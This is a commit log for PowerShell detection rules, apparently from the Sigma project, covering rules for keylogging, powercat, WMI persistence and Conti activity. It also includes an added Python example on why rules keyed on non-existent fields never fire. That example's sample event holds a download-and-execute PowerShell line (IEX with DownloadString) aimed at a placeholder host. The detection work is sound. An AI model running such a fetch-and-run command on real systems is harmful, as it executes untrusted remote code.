Commit Graph

383 Commits

Author SHA1 Message Date
f.hubaut e66007a43d fix file name case 2021-08-26 11:15:33 +02:00
frack113 33c6ff6b5f add powershell_suspicious_win32_pnpentity 2021-08-23 13:17:35 +02:00
frack113 fc9666fb4e Merge pull request #1896 from ZikyHD/fix_old_technics
Replace old MITRE techniques with new ones
2021-08-22 18:56:08 +02:00
frack113 0a410010a2 Merge pull request #1877 from frack113/red_back
Add T1546 Red Canary rules
2021-08-22 18:50:58 +02:00
SomeOne 295054dcbe Replace old MITRE techniques with new ones 2021-08-22 13:57:56 +02:00
frack113 42c90b9d20 fix powershell_psattack error 2021-08-21 10:05:47 +02:00
frack113 2f683b9ab7 fix powershell_clear_powershell_history error 2021-08-21 10:00:48 +02:00
frack113 0fb6c35b1f Cleanup PS rules 2021-08-21 09:58:58 +02:00
frack113 da839775fe Update PS rules 2021-08-21 09:50:59 +02:00
frack113 6c529f7ab2 Update PS rules 2021-08-21 09:33:52 +02:00
frack113 cb95582077 Update PowerShell rule 2021-08-21 09:08:38 +02:00
frack113 78212546a7 Merge pull request #1869 from frack113/redcanary_T1546.013
powershell_trigger_profiles T1546.013
2021-08-19 16:17:53 +02:00
frack113 90c9c08743 fix title 2021-08-19 16:09:31 +02:00
frack113 89b6e1108b powershell_wmi_persistence fix errors 2021-08-19 15:42:19 +02:00
frack113 1266a66a8d add powershell_wmi_persistence.yml 2021-08-19 15:37:28 +02:00
Florian Roth 459a0bdca1 Merge pull request #1870 from frack113/fix_fp_Renamed_Powershell
Fix some false positives in renamed PowerShell
2021-08-19 08:23:51 +02:00
Austin Songer c9128687ee Spelling Errors on Rules 2021-08-18 18:58:20 +00:00
frack113 2d05eda1be fix ContextInfo FP 2021-08-18 15:18:29 +02:00
frack113 48d0846b53 add powershell_trigger_profiles 2021-08-18 14:29:50 +02:00
frack113 6a282ad24a fix many FP 2021-08-18 13:56:14 +02:00
Florian Roth 5fa5a412d5 fix: FPs with [reflection.assembly]::Load 2021-08-18 09:49:34 +02:00
Florian Roth a0625ad074 Merge branch 'master' into rule-devel 2021-08-17 12:29:55 +02:00
Florian Roth 80b3acfce9 fix: false positive with Xen / Oracle scripts 2021-08-17 12:03:49 +02:00
frack113 dfd9e6d8f0 Merge pull request #1857 from frack113/fix_HostApplication
Update definition for powershell-classic rule
2021-08-16 17:18:24 +02:00
Florian Roth 141ca03c9b Merge pull request #1853 from secDre4mer/contileak
feat: Add some rules to detect Conti behaviour
2021-08-16 14:18:43 +02:00
frack113 911579023c fix powershell_alternate_powershell_hosts.yml 2021-08-16 13:30:45 +02:00
frack113 2dbf9af27d add definition to powershell-classic 2021-08-16 12:56:24 +02:00
frack113 e8723e892a clean-up powershell_invoke_nightmare.yml 2021-08-16 09:19:10 +02:00
Max Altgelt 5b60e0ea5a feat: Add some rules to detect Conti behaviour
Add rules based on the leaks from the Conti group to detect
malicious behaviour.
2021-08-16 09:13:51 +02:00
Max Altgelt d2a35edae9 fix: Remove powershell_alternate_hosts from PR
Remove a rule using Host Application (which may or may not exist,
based on the log parser) from the PR. A future PR will clean up
rules using Host Application.
2021-08-16 08:42:17 +02:00
Max Altgelt 6f05e33feb fix: Correct incorrect message / keyword usage
Correct a number of rules where message or keyword were incorrectly used
as field names in events (typically Windows event logs). However, neither
field actually exists and as such these strings could never match.
2021-08-12 16:28:07 +02:00
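The defect described in the commit above, shown as an added example that is not part of the Sigma project's code or this commit: a selection keyed on `message` or `keyword` is a field match on a field literally named that way, and a parsed Windows event carries no such field, so the selection can never be true. A list of plain strings under `detection`, by contrast, is a keyword search over the whole event. The event, the two detection blocks (already parsed from YAML into Python structures) and the tiny matcher below are all constructed for illustration; the matcher imitates only the subset of Sigma semantics needed here and is not a real Sigma backend.

```python
"""Why a Sigma selection keyed on a non-existent field never matches.

Added example; not code from the Sigma repository. Event, rules and the
matcher are constructed for illustration only.
"""

# Constructed PowerShell 4104 event as a log pipeline would present it.
# The free text lives in ScriptBlockText; there is no field called
# "message" or "keyword" in the parsed event.
SAMPLE_EVENT = {
    "EventID": 4104,
    "Channel": "Microsoft-Windows-PowerShell/Operational",
    "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')",
}

# Broken form (the pattern the commit removed): a mapping whose keys are
# "message" and "keyword". In Sigma a mapping key is a FIELD NAME, so this
# asks for fields named message/keyword that the event does not have.
BROKEN_DETECTION = {
    "selection": {
        "message|contains": "DownloadString",
        "keyword|contains": "DownloadString",
    },
    "condition": "selection",
}

# Fixed form: a list of plain strings is a keyword search over the event.
FIXED_DETECTION = {
    "keywords": ["DownloadString"],
    "condition": "keywords",
}


def match_field(event, key, value):
    """Field match with optional '|contains' modifier (toy subset of Sigma)."""
    field, _, modifier = key.partition("|")
    if field not in event:
        # A field the event does not carry can never match: this is the bug.
        return False
    actual = str(event[field])
    values = value if isinstance(value, list) else [value]
    if modifier == "contains":
        return any(str(v) in actual for v in values)
    return any(str(v) == actual for v in values)


def match_selection(event, selection):
    """List of strings => keyword search; mapping => all fields must match."""
    if isinstance(selection, list):
        blob = " ".join(str(v) for v in event.values())
        return any(str(s) in blob for s in selection)
    return all(match_field(event, k, v) for k, v in selection.items())


def evaluate(event, detection):
    """Evaluate a detection whose condition is a single identifier."""
    name = detection["condition"].strip()
    return match_selection(event, detection[name])


def dead_fields(detection, known_fields):
    """Lint: field names used in selections that the event schema lacks.

    known_fields is the set of fields the logsource actually produces.
    Returns (selection_name, field) pairs that can never match.
    """
    dead = []
    for name, sel in detection.items():
        if name == "condition" or not isinstance(sel, dict):
            continue
        for key in sel:
            field = key.split("|", 1)[0]
            if field not in known_fields:
                dead.append((name, field))
    return dead


if __name__ == "__main__":
    schema = set(SAMPLE_EVENT)
    print("broken matches:", evaluate(SAMPLE_EVENT, BROKEN_DETECTION))
    print("fixed matches: ", evaluate(SAMPLE_EVENT, FIXED_DETECTION))
    print("dead fields:   ", dead_fields(BROKEN_DETECTION, schema))
```

Running `dead_fields` over a rule set with the field list of the target logsource is the cheap check that would have caught these rules before they shipped; a rule that references a field the logsource cannot produce is silently dead rather than noisy, which is why this class of bug survives review.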
Florian Roth c44b22b52f Merge pull request #1762 from frack113/redcanary_collection
[OSCD] Red Canary TA0009 collection
2021-08-05 15:49:10 +02:00
Florian Roth 448868302d Merge pull request #1767 from frack113/redcanary_t1497_001
[OSCD] Detect Virtualization Environment (Windows) T1497.001
2021-08-05 15:47:37 +02:00
Florian Roth 3634901bf1 Update poweshell_detect_vm_env.yml 2021-08-05 15:47:29 +02:00
Florian Roth 6a11190e79 Merge pull request #1769 from frack113/fix_powershell_400
Cleanup eventid 400 powershell-classic
2021-08-05 15:47:04 +02:00
Florian Roth da6b5f8ec5 Merge pull request #1770 from frack113/redcanary_powershell_T1070.006
[OSCD] powershell_timestomp.yml T1070.006
2021-08-05 15:46:48 +02:00
Florian Roth b1fb462c39 Update powershell_timestomp.yml 2021-08-05 15:46:01 +02:00
frack113 f040725dd8 fix EventID: 4104 ScriptBlockText 2021-08-04 14:49:50 +02:00
frack113 644fe80786 add powershell_timestomp.yml 2021-08-03 16:01:54 +02:00
frack113 b5e4b04cb5 fix eventid 400 powershell-classic 2021-08-03 10:04:15 +02:00
frack113 0efe69bd36 add poweshell_detect_vm_env.yml 2021-08-03 08:30:26 +02:00
frack113 e33ec91b9a add powershell_keylogging.yml 2021-07-30 08:28:19 +02:00
frack113 38ede57cb4 add powershell_suspicious_recon.yml 2021-07-30 08:20:51 +02:00
frack113 2758c1aa93 add powershell_automated_collection.yml 2021-07-28 14:14:02 +02:00
frack113 aff5264096 Add check for status and level 2021-07-22 19:25:51 +02:00
Florian Roth edfd082754 Merge pull request #1716 from frack113/elk_keyword_rule
powershell_nishang_malicious_commandlets ELK keywords trouble
2021-07-22 15:01:13 +02:00
Florian Roth 7a8fcf4237 Merge pull request #1718 from frack113/powercat
[OSCD] powershell_powercat.yml T1095
2021-07-22 14:53:34 +02:00
frack113 4cc4df35d8 add powershell_suspicious_mail_acces.yml 2021-07-21 15:27:12 +02:00
frack113 72da7a3053 fix tags attack.t1095 2021-07-21 13:08:35 +02:00
frack113 41c4f1d157 add powershell_powercat.yml 2021-07-21 13:04:27 +02:00